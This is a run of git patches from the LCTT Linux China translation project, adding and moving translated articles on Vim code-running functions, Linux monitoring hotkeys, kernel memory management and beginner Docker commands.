-So, this was all about how you could manipulate things to work your way in Vim. Now, it comes to how we implement all this in Vim. We can use these Code Snippets directly in Vim and the other way around is by using the AutoCommands in Vim (autocmd’s). The beauty of autocmd is these commands need not be called by users, they execute by themselves at any certain condition which is provided by the user.
-
-What I want to do with this [autocmd] thing is that, instead of using different mappings to perform execution of codes in different Programming Languages, I would like a single mapping for execution for every language.
-
- [![autocmd in vimrc](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_4_orig.png)][6]
-
-What we did here is that I wrote autocommands for all the File Types for which I had functions for Executing the code.
-
-What’s going to happen is as soon as I open any buffer of any of the above-mentioned file types, Vim will automatically map my (Ctrl + r) to the function call and represents Enter Key, so that I don’t need to press “Enter key” everytime I press and alone does the job.
-
-To achieve this Functionality, you just need to add the function snippets to your [dot]vimrc and after that just put all those autocmds . And with that, the next time you open Vim, Vim will have all the Functionalities to execute all the Codes with the very same KeyBindings.
-
-### Conclusion
-
-That’s all for now. Hope this thing makes you love your Vim even more. I am currently exploring things in Vim, reading Documentations etc. and doing additions in [.vimrc] file and I will reach to you again when I will have something wonderful to share with you all.
-
-If you want to have a look at my current [.vimrc] file, here is the link to my Github account: [MyVimrc][7]
-
-.
-
-Please do Comment on how you liked the article.
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxandubuntu.com/home/making-vim-even-more-awesome-with-these-cool-features
-
-作者:[LINUXANDUBUNTU][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.linuxandubuntu.com
-[1]:http://www.linuxandubuntu.com/home/category/distros
-[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_orig.png
-[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_1_orig.png
-[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_2_orig.png
-[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_3_orig.png
-[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_4_orig.png
-[7]:https://github.com/phenomenal-ab/VIm-Configurations/blob/master/.vimrc
diff --git a/translated/tech/20171231 Making Vim Even More Awesome With These Cool Features.md b/translated/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
new file mode 100644
index 0000000000..9a23cbf124
--- /dev/null
+++ b/translated/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
@@ -0,0 +1,109 @@
+用一些超酷的功能使 Vim 变得更强大
+======
+
+![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/making-vim-even-more-awesome-with-these-cool-features_orig.jpg)
+
+**Vim** 是每个 [Linux 发行版][1] 中不可或缺的一部分,也是 Linux 用户最常用的工具(当然是基于终端的)。至少,这个说法对我来说是成立的。人们可能会在利用什么工具进行程序设计更好产生争议,的确 Vim 可能不是一个好的选择,因为有很多不同的 IDE 或其他高性能的类似于 `Sublime Text 3`,`Atom` 等使程序设计变得更加容易的文本编辑器。
+#### 我的感想
+
+但我认为,Vim 应该从一开始就以我们想要的方式运作,而其他编辑器让我们按照已经设计好的方式工作,实际上不是我们想要的工作方式。我不能过多地谈论其他编辑器,因为我没有过多地使用它们(我对 Vim 有偏见` Linux 中国注:我对 Vim 情有独钟`)。
+
+不管怎样,让我们用 Vim 来做一些事情吧,它完全可以胜任。
+### 利用 Vim 进行程序设计
+
+#### 执行代码
+
+
+考虑一个场景,当我们使用 Vim 设计 C++ 代码并需要编译和运行它时,该怎么做呢。
+
+(a). 我们通过 `(Ctrl + Z)` 返回到终端,或者利用 `(:wq)` 保存并退出。
+
+(b). 但是任务还没有结束,接下来需要在终端上输入类似于 `g++ fileName.cxx` 的命令进行编译。
+
+(c). 接下来需要键入 `./a.out` 执行它。
+
+
+为了让我们的 C++ 代码在 shell 中运行,需要做很多事情。但这似乎并不是利用 Vim 操作的方法( Vim 总是倾向于把几乎所有操作方法利用一个/两个按键实现)。那么,做这些事情的 Vim 的方式究竟是什么?
+#### Vim 方式
+
+
+Vim 不仅仅是一个文本编辑器,它是一种编辑文本的编程语言。这种帮助我们扩展 Vim 功能的编程语言是 `“VimScript”(Linux 中国注: Vim 脚本)`。
+
+因此,在 `VimScript` 的帮助下,我们可以只需一个按键轻松地将编译和运行代码的任务自动化。
+ [![create functions in vim .vimrc](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_orig.png)][2]
+
+
+以上是在我的 `.vimrc` 配置文件里创建的一个名为 CPP() 函数的片段。
+#### 利用 VimScript 创建函数
+
+
+在VimScript中创建函数的语法非常简单。它以关键字“
+**func**
+”开头,然后是函数名[在 VimScript 中函数名必须以大写字母开头,否则 Vim 将提示错误]。在函数的结尾用关键词
+“**endfunc**
+”。
+在函数的主体中,可以看到
+**exec**
+声明,无论您在 **exec** 关键字之后写什么,都要在 Vim 的命令模式上执行(记住,在 Vim 窗口的底部以 `:` 开始)。现在,传递给 **exec** 的字符串是(Linux 中国注: ``:!clear && g++ % && ./a.out``) -
+[![vim functions commands & symbols](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_1_orig.png)][3]
+
+
+当这个函数被调用时,它首先清除终端屏幕,因此只能看到输出,接着利用 `g++` 执行正在处理的文件,然后运行由前一步编译而形成的 `a.out` 文件。
+
+将 `Ctrl+r` 映射为运行 C++ 代码。
+-------------------------------------------------------------
+
+
+映射语句: `call CPP()` 到键组合 `Ctrl+r`,以便我现在可以按 `Ctrl+r` 来执行我的 C++ 代码,无需手动输入: `call CPP()`,然后按 `Enter` 键。
+#### 最终结果
+
+
+我们终于找到了 Vim Way 操作的方法。现在,你只需点击一个按钮,你编写的 C++ 代码就输出在你的屏幕上,你不需要键入所有冗长的命令了。这也节省了你的时间。
+
+我们也可以为其他语言实现这类功能。
+ [![create function in vim for python](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_2_orig.png)][4]
+
+
+对于Python:您可以按下映射键执行您的代码。
+ [![create function in vim for java](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_3_orig.png)][5]
+
+
+对于Java:您现在可以按下映射健,它将首先编译您的 Java 代码,然后执行您的 Java 类文件并显示输出。
+### 进一步提高
+
+
+所以,这就是如何在 Vim 中操作的方法。现在,我们来看看如何在 Vim 中实现所有这些。我们可以直接在 Vim 中使用这些代码片段,而另一种方法是使用 Vim 中的自动命令 `autocmd`。`autocmd` 的优点是这些命令无需用户调用,它们在用户所提供的任何特定条件下自动执行。
+
+我想用 [autocmd] 实现类似于单一的映射来执行每种语言替代使用不同的映射执行不同程序设计语言编译出的代码,。
+ [![autocmd in vimrc](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_4_orig.png)][6]
+
+
+在这里做的是,为所有的定义了执行相应文件类型代码的函数编写了自动命令。
+
+会发生什么当我打开任何上述提到的文件类型的缓冲区, Vim 会自动将 `Ctrl + r` 映射到函数调用和表示 Enter Key (Linux 中国注:回车键),这样就不需要每完成一个独立的任务就按一次 “Enter key” 了。
+
+为了实现这个功能,您只需将函数片段添加到[dot]vimrc(Linux 中国注: `.vimrc` 文件)文件中,然后将所有这些 `autocmds` 也一并添加进去。这样,当您下一次打开 Vim 时,Vim 将拥有所有相应的功能来执行所有具有相同绑定键的代码。
+### 总结
+
+就这些了。希望这些能让你更爱 Vim 。我目前正在探究 Vim 中的一些内容,正阅读文档,补充 [.vimrc] 文件,当我研究出一些成果后我会再次与你分享。
+如果你想看一下我现在的 [.vimrc] 文件,这是我的 Github 账户的链接: [MyVimrc][7]。
+
+期待你的好评。
+--------------------------------------------------------------------------------
+
+via: http://www.linuxandubuntu.com/home/making-vim-even-more-awesome-with-these-cool-features
+
+作者:[LINUXANDUBUNTU][a]
+译者:[stevenzdg988](https://github.com/stevenzdg988)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxandubuntu.com
+[1]:http://www.linuxandubuntu.com/home/category/distros
+[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_orig.png
+[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_1_orig.png
+[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_2_orig.png
+[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_3_orig.png
+[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_4_orig.png
+[7]:https://github.com/phenomenal-ab/VIm-Configurations/blob/master/.vimrc
From 391c58704ec802489cbc72f48ee52ae040582700 Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 13:14:56 +0800
Subject: [PATCH 193/371] table && image"
---
...m Monitoring Tools Every SysAdmin Should Know.md | 13 ++++++++++++-
1 file changed, 12 insertions(+), 1 deletion(-)
diff --git a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
index ec121398d0..0f8e48c826 100644
--- a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
+++ b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
@@ -13,11 +13,22 @@ Need to monitor Linux server performance? Try these built-in commands and a few
top command display Linux processes. It provides a dynamic real-time view of a running system i.e. actual process activity. By default, it displays the most CPU-intensive tasks running on the server and updates the list every five seconds.
+![](https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/top-Linux-monitoring-command.jpg)
+
#### Commonly Used Hot Keys With top Linux monitoring tools
Here is a list of useful hot keys:
-Hot KeyUsagetDisplays summary information off and on.mDisplays memory information off and on.ASorts the display by top consumers of various system resources. Useful for quick identification of performance-hungry tasks on a system.fEnters an interactive configuration screen for top. Helpful for setting up top for a specific task.oEnables you to interactively select the ordering within top.rIssues renice command.kIssues kill command.zTurn on or off color/mono
+| Hot Key | Usage |
+|---|---|
+| t | Displays summary information off and on. |
+| m | Displays memory information off and on. |
+| A | Sorts the display by top consumers of various system resources. Useful for quick identification of performance-hungry tasks on a system. |
+| f | Enters an interactive configuration screen for top. Helpful for setting up top for a specific task. |
+| o | Enables you to interactively select the ordering within top. |
+| r | Issues renice command. |
+| k | Issues kill command. |
+| z | Turn on or off color/mono |
[How do I Find Out Linux CPU Utilization?][1]
From f5db223d4ef7767b5a467506958551cb21478c93 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Tue, 9 Jan 2018 14:04:11 +0800
Subject: [PATCH 194/371] =?UTF-8?q?20180109-1=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...0203 How the Kernel Manages Your Memory.md | 103 ++++++++++++++++++
1 file changed, 103 insertions(+)
create mode 100644 sources/tech/20090203 How the Kernel Manages Your Memory.md
diff --git a/sources/tech/20090203 How the Kernel Manages Your Memory.md b/sources/tech/20090203 How the Kernel Manages Your Memory.md
new file mode 100644
index 0000000000..9eb30b0b23
--- /dev/null
+++ b/sources/tech/20090203 How the Kernel Manages Your Memory.md
@@ -0,0 +1,103 @@
+How the Kernel Manages Your Memory
+============================================================
+
+
+After examining the [virtual address layout][1] of a process, we turn to the kernel and its mechanisms for managing user memory. Here is gonzo again:
+
+![Linux kernel mm_struct](http://static.duartes.org/img/blogPosts/mm_struct.png)
+
+Linux processes are implemented in the kernel as instances of [task_struct][2], the process descriptor. The [mm][3] field in task_struct points to the memory descriptor, [mm_struct][4], which is an executive summary of a program’s memory. It stores the start and end of memory segments as shown above, the [number][5] of physical memory pages used by the process (rss stands for Resident Set Size), the [amount][6] of virtual address space used, and other tidbits. Within the memory descriptor we also find the two work horses for managing program memory: the set of virtual memory areas and the page tables. Gonzo’s memory areas are shown below:
+
+![Kernel memory descriptor and memory areas](http://static.duartes.org/img/blogPosts/memoryDescriptorAndMemoryAreas.png)
+
+Each virtual memory area (VMA) is a contiguous range of virtual addresses; these areas never overlap. An instance of [vm_area_struct][7] fully describes a memory area, including its start and end addresses, [flags][8] to determine access rights and behaviors, and the [vm_file][9] field to specify which file is being mapped by the area, if any. A VMA that does not map a file is anonymous. Each memory segment above ( _e.g._ , heap, stack) corresponds to a single VMA, with the exception of the memory mapping segment. This is not a requirement, though it is usual in x86 machines. VMAs do not care which segment they are in.
+
+A program’s VMAs are stored in its memory descriptor both as a linked list in the [mmap][10] field, ordered by starting virtual address, and as a [red-black tree][11] rooted at the [mm_rb][12] field. The red-black tree allows the kernel to search quickly for the memory area covering a given virtual address. When you read file `/proc/pid_of_process/maps`, the kernel is simply going through the linked list of VMAs for the process and [printing each one][13].
+
+In Windows, the [EPROCESS][14] block is roughly a mix of task_struct and mm_struct. The Windows analog to a VMA is the Virtual Address Descriptor, or [VAD][15]; they are stored in an [AVL tree][16]. You know what the funniest thing about Windows and Linux is? It’s the little differences.
+
+The 4GB virtual address space is divided into pages. x86 processors in 32-bit mode support page sizes of 4KB, 2MB, and 4MB. Both Linux and Windows map the user portion of the virtual address space using 4KB pages. Bytes 0-4095 fall in page 0, bytes 4096-8191 fall in page 1, and so on. The size of a VMA _must be a multiple of page size_ . Here’s 3GB of user space in 4KB pages:
+
+![4KB Pages Virtual User Space](http://static.duartes.org/img/blogPosts/pagedVirtualSpace.png)
+
+The processor consults page tables to translate a virtual address into a physical memory address. Each process has its own set of page tables; whenever a process switch occurs, page tables for user space are switched as well. Linux stores a pointer to a process’ page tables in the [pgd][17] field of the memory descriptor. To each virtual page there corresponds one page table entry (PTE) in the page tables, which in regular x86 paging is a simple 4-byte record shown below:
+
+![x86 Page Table Entry (PTE) for 4KB page](http://static.duartes.org/img/blogPosts/x86PageTableEntry4KB.png)
+
+Linux has functions to [read][18] and [set][19] each flag in a PTE. Bit P tells the processor whether the virtual page is present in physical memory. If clear (equal to 0), accessing the page triggers a page fault. Keep in mind that when this bit is zero, the kernel can do whatever it pleases with the remaining fields. The R/W flag stands for read/write; if clear, the page is read-only. Flag U/S stands for user/supervisor; if clear, then the page can only be accessed by the kernel. These flags are used to implement the read-only memory and protected kernel space we saw before.
+
+Bits D and A are for dirty and accessed. A dirty page has had a write, while an accessed page has had a write or read. Both flags are sticky: the processor only sets them, they must be cleared by the kernel. Finally, the PTE stores the starting physical address that corresponds to this page, aligned to 4KB. This naive-looking field is the source of some pain, for it limits addressable physical memory to [4 GB][20]. The other PTE fields are for another day, as is Physical Address Extension.
+
+A virtual page is the unit of memory protection because all of its bytes share the U/S and R/W flags. However, the same physical memory could be mapped by different pages, possibly with different protection flags. Notice that execute permissions are nowhere to be seen in the PTE. This is why classic x86 paging allows code on the stack to be executed, making it easier to exploit stack buffer overflows (it’s still possible to exploit non-executable stacks using [return-to-libc][21] and other techniques). This lack of a PTE no-execute flag illustrates a broader fact: permission flags in a VMA may or may not translate cleanly into hardware protection. The kernel does what it can, but ultimately the architecture limits what is possible.
+
+Virtual memory doesn’t store anything, it simply _maps_ a program’s address space onto the underlying physical memory, which is accessed by the processor as a large block called the physical address space. While memory operations on the bus are [somewhat involved][22], we can ignore that here and assume that physical addresses range from zero to the top of available memory in one-byte increments. This physical address space is broken down by the kernel into page frames. The processor doesn’t know or care about frames, yet they are crucial to the kernel because the page frame is the unit of physical memory management. Both Linux and Windows use 4KB page frames in 32-bit mode; here is an example of a machine with 2GB of RAM:
+
+![Physical Address Space](http://static.duartes.org/img/blogPosts/physicalAddressSpace.png)
+
+In Linux each page frame is tracked by a [descriptor][23] and [several flags][24]. Together these descriptors track the entire physical memory in the computer; the precise state of each page frame is always known. Physical memory is managed with the [buddy memory allocation][25]technique, hence a page frame is free if it’s available for allocation via the buddy system. An allocated page frame might be anonymous, holding program data, or it might be in the page cache, holding data stored in a file or block device. There are other exotic page frame uses, but leave them alone for now. Windows has an analogous Page Frame Number (PFN) database to track physical memory.
+
+Let’s put together virtual memory areas, page table entries and page frames to understand how this all works. Below is an example of a user heap:
+
+![Physical Address Space](http://static.duartes.org/img/blogPosts/heapMapped.png)
+
+Blue rectangles represent pages in the VMA range, while arrows represent page table entries mapping pages onto page frames. Some virtual pages lack arrows; this means their corresponding PTEs have the Present flag clear. This could be because the pages have never been touched or because their contents have been swapped out. In either case access to these pages will lead to page faults, even though they are within the VMA. It may seem strange for the VMA and the page tables to disagree, yet this often happens.
+
+A VMA is like a contract between your program and the kernel. You ask for something to be done (memory allocated, a file mapped, etc.), the kernel says “sure”, and it creates or updates the appropriate VMA. But _it does not_ actually honor the request right away, it waits until a page fault happens to do real work. The kernel is a lazy, deceitful sack of scum; this is the fundamental principle of virtual memory. It applies in most situations, some familiar and some surprising, but the rule is that VMAs record what has been _agreed upon_ , while PTEs reflect what has _actually been done_ by the lazy kernel. These two data structures together manage a program’s memory; both play a role in resolving page faults, freeing memory, swapping memory out, and so on. Let’s take the simple case of memory allocation:
+
+![Example of demand paging and memory allocation](http://static.duartes.org/img/blogPosts/heapAllocation.png)
+
+When the program asks for more memory via the [brk()][26] system call, the kernel simply [updates][27]the heap VMA and calls it good. No page frames are actually allocated at this point and the new pages are not present in physical memory. Once the program tries to access the pages, the processor page faults and [do_page_fault()][28] is called. It [searches][29] for the VMA covering the faulted virtual address using [find_vma()][30]. If found, the permissions on the VMA are also checked against the attempted access (read or write). If there’s no suitable VMA, no contract covers the attempted memory access and the process is punished by Segmentation Fault.
+
+When a VMA is [found][31] the kernel must [handle][32] the fault by looking at the PTE contents and the type of VMA. In our case, the PTE shows the page is [not present][33]. In fact, our PTE is completely blank (all zeros), which in Linux means the virtual page has never been mapped. Since this is an anonymous VMA, we have a purely RAM affair that must be handled by [do_anonymous_page()][34], which allocates a page frame and makes a PTE to map the faulted virtual page onto the freshly allocated frame.
+
+Things could have been different. The PTE for a swapped out page, for example, has 0 in the Present flag but is not blank. Instead, it stores the swap location holding the page contents, which must be read from disk and loaded into a page frame by [do_swap_page()][35] in what is called a [major fault][36].
+
+This concludes the first half of our tour through the kernel’s user memory management. In the next post, we’ll throw files into the mix to build a complete picture of memory fundamentals, including consequences for performance.
+
+--------------------------------------------------------------------------------
+
+via: http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory/
+
+作者:[Gustavo Duarte][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://duartes.org/gustavo/blog/about/
+[1]:http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory
+[2]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1075
+[3]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1129
+[4]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L173
+[5]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L197
+[6]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L206
+[7]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L99
+[8]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm.h#L76
+[9]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L150
+[10]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L174
+[11]:http://en.wikipedia.org/wiki/Red_black_tree
+[12]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L175
+[13]:http://lxr.linux.no/linux+v2.6.28.1/fs/proc/task_mmu.c#L201
+[14]:http://www.nirsoft.net/kernel_struct/vista/EPROCESS.html
+[15]:http://www.nirsoft.net/kernel_struct/vista/MMVAD.html
+[16]:http://en.wikipedia.org/wiki/AVL_tree
+[17]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L185
+[18]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L173
+[19]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L230
+[20]:http://www.google.com/search?hl=en&q=2^20+*+2^12+bytes+in+GB
+[21]:http://en.wikipedia.org/wiki/Return-to-libc_attack
+[22]:http://duartes.org/gustavo/blog/post/getting-physical-with-memory
+[23]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm_types.h#L32
+[24]:http://lxr.linux.no/linux+v2.6.28/include/linux/page-flags.h#L14
+[25]:http://en.wikipedia.org/wiki/Buddy_memory_allocation
+[26]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
+[27]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L2050
+[28]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L583
+[29]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L692
+[30]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1466
+[31]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L711
+[32]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2653
+[33]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2674
+[34]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2681
+[35]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2280
+[36]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2316
From 9f073879f329be3b96325ff892281bb88a2a107a Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 18:45:42 +0800
Subject: [PATCH 195/371] translate done: 20170426 Important Docker commands
for Beginners.md
---
...Important Docker commands for Beginners.md | 178 ----------------
...Important Docker commands for Beginners.md | 190 ++++++++++++++++++
2 files changed, 190 insertions(+), 178 deletions(-)
delete mode 100644 sources/tech/20170426 Important Docker commands for Beginners.md
create mode 100644 translated/tech/20170426 Important Docker commands for Beginners.md
diff --git a/sources/tech/20170426 Important Docker commands for Beginners.md b/sources/tech/20170426 Important Docker commands for Beginners.md
deleted file mode 100644
index ad6acf1d12..0000000000
--- a/sources/tech/20170426 Important Docker commands for Beginners.md
+++ /dev/null
@@ -1,178 +0,0 @@
-translating by lujun9972
-Important Docker commands for Beginners
-======
-In our earlier tutorial, we learned to[ **install Docker on RHEL\ CentOS 7 & also created a docker container.**][1] In this tutorial, we will learn more commands to manipulate a docker container.
-
-### **Syntax for using Docker command**
-
- **$ docker [option] [command] [arguments]
-**
-
-To view the list of all available commands that can be used with docker, run
-
- **$ docker
-**
-
-& we will get the following list of commands as the output,
-
- **attach Attach to a running container
-build Build an image from a Dockerfile
-commit Create a new image from a container's changes
-cp Copy files/folders between a container and the local filesystem
-create Create a new container
-diff Inspect changes on a container's filesystem
-events Get real time events from the server
-exec Run a command in a running container
-export Export a container's filesystem as a tar archive
-history Show the history of an image
-images List images
-import Import the contents from a tarball to create a filesystem image
-info Display system-wide information
-inspect Return low-level information on a container or image
-kill Kill a running container
-load Load an image from a tar archive or STDIN
-login Log in to a Docker registry
-logout Log out from a Docker registry
-logs Fetch the logs of a container
-network Manage Docker networks
-pause Pause all processes within a container
-port List port mappings or a specific mapping for the CONTAINER
-ps List containers
-pull Pull an image or a repository from a registry
-push Push an image or a repository to a registry
-rename Rename a container
-restart Restart a container
-rm Remove one or more containers
-rmi Remove one or more images
-run Run a command in a new container
-save Save one or more images to a tar archive
-search Search the Docker Hub for images
-start Start one or more stopped containers
-stats Display a live stream of container(s) resource usage statistics
-stop Stop a running container
-tag Tag an image into a repository
-top Display the running processes of a container
-unpause Unpause all processes within a container
-update Update configuration of one or more containers
-version Show the Docker version information
-volume Manage Docker volumes
-wait Block until a container stops, then print its exit code
-**
-
-To further view the options available with a command, run
-
- **$ docker docker-subcommand info
-**
-
-& we will get a list of options that we can use with the docker-sub command.
-
-### **Testing connection with Docker Hub**
-
-By default, all the images that are used are pulled from Docker Hub. We can upload or download an image for OS from Docker Hub. To make sure that we can do so, run
-
- **$ docker run hello-world
-**
-
-& the output should be,
-
- **Hello from Docker.
-This message shows that your installation appears to be working correctly.
-…
-**
-
-This output message shows that we can access Docker Hub & can now download docker images from Docker Hub.
-
-### **Searching an Image**
-
-To search for an image for the container, run
-
- **$ docker search Ubuntu
-**
-
-& we should get list of available Ubuntu images. Remember if you are looking for an official image, look for [OK] under the official column.
-
-### **Downloading an image**
-
-Once we have searched and found the image we are looking for, we can download it by running,
-
- **$ docker pull Ubuntu
-**
-
-### **Viewing downloaded images**
-
-To view all the downloaded images, run
-
- **$ docker images
-**
-
-### **Running an container**
-
-To run a container using the downloaded image , we will use
-
- **$ docker run -it Ubuntu
-**
-
-Here, using '-it' will open a shell that can be used to interact with the container. Once the container is up & running, we can then use it as a normal machine & execute any commands that we require for our container.
-
-### **Displaying all docker containers**
-
-To view the list of all docker containers, run
-
- **$ docker ps
-**
-
-The output will contain list ofcontainers with container id.
-
-### **Stopping a docker container**
-
-To stop a docker container, run
-
- **$ docker stop container-id
-**
-
-### **Exit from the container**
-
-To exit from the container, type
-
- **$ exit
-**
-
-### **Saving the state of the container**
-
-Once the container is running & we have changed some settings in the container, like for example installed apache server, we need to save the state of the container. Image created is saved on the local system.
-
-To commit & save the state of the container, run
-
- **$ docker commit 85475ef774 repository/image_name
-**
-
-Here, **commit** will save the container state,
-
- **85475ef774** , is the container id of the container,
-
- **repository** , usually the docker hub username (or name of the repository added)
-
- **image_name** , will be the new name of the image.
-
-We can further add more information to the above command using '-m' & '-a'. With '-m', we can mention a message saying that apache server is installed & with '-a' we can add author name.
-
- **For example**
-
- **docker commit -m "apache server installed"-a "Dan Daniels" 85475ef774 daniels_dan/Cent_container
-**
-
-This completes our tutorial on important commands used in Dockers, please share your comments/queries in the comment box below.
-
-
---------------------------------------------------------------------------------
-
-via: http://linuxtechlab.com/important-docker-commands-beginners/
-
-作者:[Shusain][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linuxtechlab.com/author/shsuain/
-[1]:http://linuxtechlab.com/create-first-docker-container-beginners-guide/
diff --git a/translated/tech/20170426 Important Docker commands for Beginners.md b/translated/tech/20170426 Important Docker commands for Beginners.md
new file mode 100644
index 0000000000..3bd079de0c
--- /dev/null
+++ b/translated/tech/20170426 Important Docker commands for Beginners.md
@@ -0,0 +1,190 @@
+为小白准备的重要 Docker 命令说明
+======
+在早先的教程中,我们学过了[在 RHEL\ CentOS 7 上安装 Docker 并创建 docker 容器 .][1] 在本教程中,我们会学习管理 docker 容器的其他命令。
+
+### Docker 命令语法
+
+```
+$ docker [option] [command] [arguments]
+```
+
+要列出 docker 支持的所有命令,运行
+
+```
+$ docker
+```
+
+我们会看到如下结果,
+
+```
+attach Attach to a running container
+build Build an image from a Dockerfile
+commit Create a new image from a container's changes
+cp Copy files/folders between a container and the local filesystem
+create Create a new container
+diff Inspect changes on a container's filesystem
+events Get real time events from the server
+exec Run a command in a running container
+export Export a container's filesystem as a tar archive
+history Show the history of an image
+images List images
+import Import the contents from a tarball to create a filesystem image
+info Display system-wide information
+inspect Return low-level information on a container or image
+kill Kill a running container
+load Load an image from a tar archive or STDIN
+login Log in to a Docker registry
+logout Log out from a Docker registry
+logs Fetch the logs of a container
+network Manage Docker networks
+pause Pause all processes within a container
+port List port mappings or a specific mapping for the CONTAINER
+ps List containers
+pull Pull an image or a repository from a registry
+push Push an image or a repository to a registry
+rename Rename a container
+restart Restart a container
+rm Remove one or more containers
+rmi Remove one or more images
+run Run a command in a new container
+save Save one or more images to a tar archive
+search Search the Docker Hub for images
+start Start one or more stopped containers
+stats Display a live stream of container(s) resource usage statistics
+stop Stop a running container
+tag Tag an image into a repository
+top Display the running processes of a container
+unpause Unpause all processes within a container
+update Update configuration of one or more containers
+version Show the Docker version information
+volume Manage Docker volumes
+wait Block until a container stops, then print its exit code
+```
+
+要进一步查看某个 command 支持的选项,运行
+
+```
+$ docker docker-subcommand info
+```
+
+就会列出 docker 子命令所支持的选项了。
+
+### 测试与 Docker Hub 的连接
+
+默认,所有镜像都是从 Docker Hub 中拉取下来的。我们可以从 Docker Hub 上传或下载操作系统镜像。为了检查我们是否能够正常地通过 Docker Hub 上传/下载镜像,运行
+
+```
+$ docker run hello-world
+```
+
+结果应该是,
+
+```
+Hello from Docker.
+This message shows that your installation appears to be working correctly.
+…
+```
+
+输出结果表示你可以访问 Docker Hub 而且也能从 Docker Hub 下载 docker 镜像。
+
+### 搜索镜像
+
+搜索容器的镜像,运行
+
+```
+$ docker search Ubuntu
+```
+
+我们应该会得到 age 可用的 Ubuntu 镜像的列表。记住,如果你想要的是官方的镜像,经检查 `official` 这一列上是否为 `[OK]`。
+
+### 下载镜像
+
+一旦搜索并找到了我们想要的镜像,我们可以运行下面语句来下载它,
+
+```
+$ docker pull Ubuntu
+```
+
+要查看所有已下载的镜像,运行
+
+```
+$ docker images
+```
+
+### 运行容器
+
+使用已下载镜像来运行容器,使用下面命令
+
+```
+$ docker run -it Ubuntu
+```
+
+这里,使用 '-it' 会打开一个 shell 与容器交互。容器启动并运行后,我们就可以像普通机器那样来使用它了,我们可以在容器中执行任何命令。
+
+### 显示所有的 docker 容器
+
+要列出所有 docker 容器,运行
+
+```
+$ docker ps
+```
+
+会输出一个容器列表,每个容器都有一个容器 id 标识。
+
+### 停止 docker 容器
+
+要停止 docker 容器,运行
+
+```
+$ docker stop container-id
+```
+
+### 从容器中退出
+
+要从容器中退出,执行
+
+```
+$ exit
+```
+
